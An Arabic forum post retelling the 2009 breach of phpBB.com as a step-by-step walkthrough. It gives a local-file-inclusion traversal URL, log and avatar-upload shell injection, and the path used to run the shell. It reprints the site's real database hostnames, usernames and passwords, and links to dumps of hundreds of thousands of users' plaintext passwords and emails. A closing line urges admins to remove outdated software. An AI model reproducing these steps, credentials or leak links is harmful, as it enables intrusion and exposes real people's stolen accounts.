مساحة اعلانات نصية ذهبية |
||
اعلن هنا | اعلن هنا | اعلن هنا |
|
|
|
|
أدوات الموضوع | انواع عرض الموضوع |
#1
|
|||
|
|||
phpBB.com Hacked
السلام عليكم ...
بصراحة اليوم فاجئني خبر من صديق لي يقلي على إختراق موقع البرنامج الشهير www.phpBB.com حيث انه قام بإختراقها بأسهل طريقة لم تتوقع ! عن طريق برنامج الPHPlist المعروف ايضا ولاكن للاسف قبل ايام قليلة طرحت ثغره فيه بلميلورم الثغره عبارة عن Local File Inclusion Exploit حيث قام المخترق بلولوج لملف ال/etc/passwd لسيرفر البرنامج عن طريق الامر كود: http://www.phpbb.com/lists/admin/ind.../../etc/passwd والملف طبعا تم رفعه على الرايبد شير كود: http://rapidshare.com/files/192159914/etc.txt ومن ثم توجه الى ملف الاباتشي لمعرفه مسار الموقع كود: /etc/httpd/conf/httpd.conf وتم الوصول لملف الإيرر كود: /home/logs/phpbb.com/error_log ومن ثم تم معرفة مسار منتديات الphpBB كود: home/virtual/phpbb.com/community ومعروف عن منتديات الphpBB انك تستطيع حقن كود (شيل) بملف الerror log , ولو تركب منتدى phpBB بجهازك تشوف المسار يكون كدا كود: /home/virtual/phpbb.com/community/images/avatars/upload وثم تم حقن الكود (شيل) عن طريق رفع الصورة كود: (secret hash)_userid.jpg ومن ثم قام بمعرفة السيكريت كود حق الشل ( الصورة ) عن طريقة ملف الإيرر لوج الي تم إيضاحه مسبقا كود: f51ee61fe7a83fdf72780912bced0855 وبعدها يصير كل مايبي يشغل الكود ( الشيل ) بلطريقة هذه ( مثل تخطي المود سيكيورتي).. كود: /../../../../../../home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg وهذه الطريقة كان المخترق بيمتحن سيرفرهم اذا تمشي عليهم ام لا ... بحيث كان السكربت يقرا الكونفيج كود: /home/virtual/phpbb.com/community/config.php كود: $dbms = 'mysqli'; $dbhost = 'phpbb.db.osuosl.org'; $dbport = ''; $dbname = 'phpbb'; $dbuser = 'phpbb2'; $dbpasswd = 'saxM9nfRjLbJ2Yy5'; $table_prefix = 'community_'; وتم قرائة ملف الكونفيج لبرنامج الPHPLIST :dالمصيبة هذا هع هع كود: $database_host = "localhost"; $database_name = "phpbb_phplist"; $database_user = 'phplist'; $database_password = 'Berti3_Danc3'; طبعا هذه الطريقة شرحتها لكم من موقع قام بعمله على الرابط http://hackedphpbb.blogspot.com/ وبلنهاية تم سحب باسووردات الاعضاء اكثر من 200.000 الف عضو بلإضافة الى باسووردات وايميلات مشتركين بنحو 400.000 الف عضو ! والمصيبة انه باسوورداتهم كلها كلير تكست !!!! وهذه القواعد ومعلومات الأعضاء وايميلاتهم تم رفعها على الرايبد شير كود: http://rapidshare.com/files/192305758/out.txt http://rapidshare.com/files/192304153/phpbb_users.sql http://hackedphpbb.pastebin.com/f1399b3e8 http://rapidshare.com/files/192261517/backup_sql.gz وبلنهاية رسالتهم من الموقع ! كود: Maintenance We are sorry to report that we have been attacked through a vulnerability in an outdated PHPList installation. phpBB.com and related sites will remain unavailable while we work to recover. No vulnerabilities have been found in the phpBB software itself. You can download phpBB here: http://www.ohloh.net/p/phpbb You can get support at the temporary support forums or on IRC: chat.freenode.net #phpbb – the phpBB team ونتمنى من الاخوة اخذ الإختراق هذا موعظة لعدم نسيان او التهاون بوجود ملفات قديمة بلمنتدى ! حيث انه المخترق كان عضو قديم بلمنتدى وتذكر ! انه الموقع يحتوي على البرنامج المصاب ! وقام المخترق بتوضيح إختراقه للموقع حيث قال كود: -----------------------------------UPDATE to all that same i am a script kiddie, **** you phpbb, i did not alter any files on your server, everything i gained access to has been listed in this blog تحياتي ! :nice: المصـــدر |
pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore |
|
|
المواضيع المتشابهه | ||||
الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
phpbb 3.0.6 آخر إصدار عربي | اشراق العالمrss | اشراق شامل - منوعات | 0 | 02-22-2009 12:22 PM |
طريقة التحويل من phpbb 2.0x الى bb4dd 2.0x | اشراق العالمrss | اشراق شامل - منوعات | 0 | 02-22-2009 12:22 PM |
عآآجل : موقع phpBB.com يتعرض لاختراق خطير يوقفه عن العمل !!! | اشراق العالمrss | القناة الإخبارية - أخبار | 0 | 02-08-2009 12:25 AM |
موقع phpBB.com يتعرض لاختراق خطير يوقفه عن العمل | اشراق العالمrss | القناة الإخبارية - أخبار | 0 | 02-06-2009 06:40 AM |
شراء روابط نصية | |
راسلنا الآن لشراء روابط نصية باك لينك وجيست بوست | خدمات الباك لينك والروابط النصية |
روابط نصية AAXA |
عسل النحل |
روابط نصية AA1A | |||||
كورة لايف | koora live | مباريات اليوم بث مباشر | kora 360 | koora4live | كورة لايف |
koora live | مباريات اليوم بث مباشر | kora 360 | koora4live | kooralive | مساحة إعلانيه |
روابط نصية2 M4U | ||||
متجر كي ستور | شدات ببجي اقساط | بطاقات قوقل بلاي | بطاقات ايتونز | اكواد شدات ببجي |
روابط نصية AAZ | ||
متجر الرياض | شدات ببجي | شحن شدات ببجي |
روابط نصية KSM | |||||||
خصومات | هدايا وكوبونات | توفير المال | مال واستثمار | صفقات وتسوق | عروض اسواق السعودية | تحسين مالي | كوبونات |
روابط نصية AN | ||||
يلا شوت | يلا شوت | يلا لايف | yalla shoot | يلا شوت |
روابط نصية M11 | |||||||
كورة جول | يلا لايف | دوت سبورت | bein match | yalla shoot | yalla shoot | koora live | koora live |
يلا شوت | koora4live | سوريا لايف | تابع لايف | كورة لايف | كورة جول | كورة لايف | koora live |
روابط نصية AWA | ||||
كورة لايف | Koora live | يلا شوت | Yalla shoot | يلا شوت |
روابط نصية AA3A | ||||
تقييم شركة exness | تقييم شركة binance | تقييم شركة avatrade | تقييم شركة evest | افضل شركات التداول |
روابط نصية S22 | ||||
تشليح السيارات بالرياض | شراء سيارات تشليح بالرياض | تشليح | تشليح الحاير | تشليح السلى |
موقع شراء سيارات تشليح | شراء سيارات تشليح | تشليح السيارات | قطع غيار تشليح | تشاليح |
روابط نصية AAPA | ||||
دراما كافيه | دراما صح | اهواك Tv | فوستا | شبكتي Tv |
Syria liv | مساحة إعلانيه |
روابط نصية AA25 | ||
عبادي الخليج | شدات ببجي | شدات ببجي تمارا |
روابط نصية AA44 | |||||
كيفية شراء سهم امازون | كيفية شراء سهم ارامكو | كيفية شراء سهم لوسيد | كيفية الاستثمار في الذهب | تقييم شركة evest | تعلم تداول الاسهم |